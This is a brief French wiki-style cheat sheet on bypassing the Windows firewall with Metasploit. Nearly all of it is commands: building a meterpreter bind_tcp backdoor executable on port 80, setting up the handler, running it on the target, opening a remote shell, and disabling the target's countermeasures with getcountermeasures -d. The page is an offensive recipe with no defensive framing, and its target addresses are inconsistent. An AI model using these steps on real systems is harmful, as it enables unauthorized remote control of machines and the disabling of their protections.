Firewall windows
Aller à la navigation
Aller à la recherche
| Fiche express | |
|---|---|
| Domaine | Contournement du pare-feu Windows |
| Payload | windows/meterpreter/bind_tcp
|
| Contexte | Metasploit |
| Voir aussi | Meterpreter · Ms08 067 |
Le payload bind_tcp permet de contourner le pare-feu Windows en écoutant sur un port autorisé de la machine cible (ici 80), plutôt qu'en initiant une connexion sortante.
Génération et handler
msfpayload windows/meterpreter/bind_tcp RHOST=192.168.0.10 LPORT=80 X > bd.exe
msfconsole -q
use exploit/multi/handler
set payload windows/meterpreter/bind_tcp
set LPORT 80
set LHOST 192.168.0.10
exploit
Lancer bd.exe sur la cible, puis :
set RHOST 192.168.0.1
rexploit
meterpreter> shell
Contre-mesures observées
meterpreter> run getcountermeasures
meterpreter> run getcountermeasures -d